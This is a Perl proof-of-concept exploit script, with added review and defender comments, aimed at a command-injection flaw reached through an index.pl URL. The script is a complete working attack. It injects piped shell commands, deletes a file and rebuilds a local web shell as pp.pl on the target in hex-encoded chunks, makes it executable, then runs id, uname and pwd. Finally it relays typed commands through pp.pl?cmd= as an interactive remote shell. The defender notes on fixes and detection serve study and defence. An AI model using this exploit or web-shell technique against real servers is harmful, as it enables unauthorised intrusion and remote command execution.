#!/usr/bin/perl
#oxagast
#
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ _)
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Purpose: proof-of-concept for a command-injection flaw reached through an
# index.pl URL. The two arguments are the parts of a URL before and after the
# injection point; the script places "|command|" between them, uses that to
# write a copy of the local ./pp.pl next to the target script, and then
# relays lines typed on STDIN to pp.pl?cmd=... and prints the replies.
#
# NOTE(review): the server-side flaw itself is not shown in this file. Requests
# of this shape typically work when a CGI hands a request value to Perl's
# two-argument open(), which treats a leading or trailing "|" as a command
# pipe -- confirm against the affected application.
#
# Defender notes, derived from what this script sends:
#   * Fix: use three-argument open() with an explicit mode, validate the
#     parameter against an allow-list, and run the CGI under taint mode (-T).
#   * Detection: request lines for index.pl containing "|" (may appear
#     percent-encoded), in particular "rm -f pp.pl", "echo -n -e" followed by
#     long runs of \\xNN, and "chmod 0711 ./pp.pl"; followed by requests to
#     pp.pl with a cmd= parameter.
#   * Host check: an unexpected executable pp.pl in the web application's
#     working directory (the script assumes that is where index.pl is served
#     from).
#
# NOTE(review): no "use strict" / "use warnings"; every variable below is a
# package global.
use LWP::Simple;                              # Loads the downloading module from LWP
use List::MoreUtils qw(natatime);             # Loads the n-at-a-time module from List::MoreUtils
$part1 = @ARGV[0];$part2 = @ARGV[1];          # Takes the two arguments: URL text before and after the injection point
                                              # (@ARGV[0] is a one-element slice; it evaluates to the same value as $ARGV[0])
$lfn = "./pp.pl";                             # Local file whose bytes are sent
$rfn = "pp.pl";                               # Name the file is written under on the remote side
$baseurl = $part1;
$baseurl =~ s/index.pl.*//;                   # Base URL: everything before "index.pl" in the first argument
$stuff = get("$part1\|rm -f $rfn\|$part2");   # Uses the pipe bug to remove the file if it's there so new data can be appended
                                              # ($stuff is not read again in this script)
$buff = "";                                   # Initializes the read buffer
$string = "";                                 # Initialized but never used; the data is accumulated in $file below
open FILEHANDLE, "<", $lfn;                   # Open the local file for reading (the result of open is not checked)
binmode FILEHANDLE;                           # Read in binary mode
while(read (FILEHANDLE, $buff, 1)) {          # Read one byte at a time until the end of the file
  $file .= $buff;                             # Append the byte to $file
}                                             # Close loop
close FILEHANDLE;                             # Close the file because we are done reading it
$unpacked = unpack("H*","$file");             # Turns the file contents into one hexadecimal string
$ib = " ";                                    # ib is a space, used as a separator
$unpacked =~ s/(..)/$ib$1/g;                  # Globally put a space in front of every pair of hex digits
$howmuch = 256;                               # How many bytes (hex pairs) to send per request
@hexxy = split(" ", $unpacked);               # Split on the spaces so each list element is one hex pair
$it = natatime $howmuch, @hexxy;              # Iterator that hands back $howmuch hex pairs at a time
while( my @hex = $it->()) {                   # Pull the next chunk of hex pairs into @hex
  for $hexer (0..scalar(@hex)-1) {            # $hexer counts from 0 to the last index of the chunk
    @hex[$hexer] =~ s/(..)/\\\\x$1/;          # Put two backslashes and an x before this hex pair
    $hexstring = join "", @hex;               # Join the whole chunk (converted and not-yet-converted pairs) for echo
    if ($hexstring =~ m/\\x..$/g) {           # True only when the string ends in a converted pair, i.e. once the
                                              # last element of the chunk has been rewritten
      # print "$hexstring";                   # Print the hex codes it sent
      get("$part1\|echo -n -e $hexstring >> $rfn\|$part2");   # One GET per chunk: echo without a trailing newline and with
                                                              # escape interpretation, appended to the remote file
    }                                         # Closes if
  }                                           # Closes for loop
}                                             # Closes iterator loop
get("$part1|chmod 0711 ./pp.pl|$part2");      # Change perms on the written file
$idstr = get($baseurl . "pp.pl?cmd=id");          # id
$unstr = get($baseurl . "pp.pl?cmd=uname -a");    # uname
$cwd = get($baseurl . "pp.pl?cmd=pwd");           # get current dir
chomp($idstr);                                # strip the trailing newline
chomp($unstr);
print $idstr . $unstr;                        # print id and uname -a
chomp($cwd);
chomp($cwd);                                  # second chomp; only has an effect if two newlines were returned
while($comm = <STDIN>) {                      # get input
  print "$cwd \$ ";                           # fake $PS1
  chomp($comm);
  $content = get($baseurl . "pp.pl?cmd=" . $comm);   # send the typed line as the cmd parameter and collect the reply
  chomp($content);
  print $content;                             # print it
}
# got shells?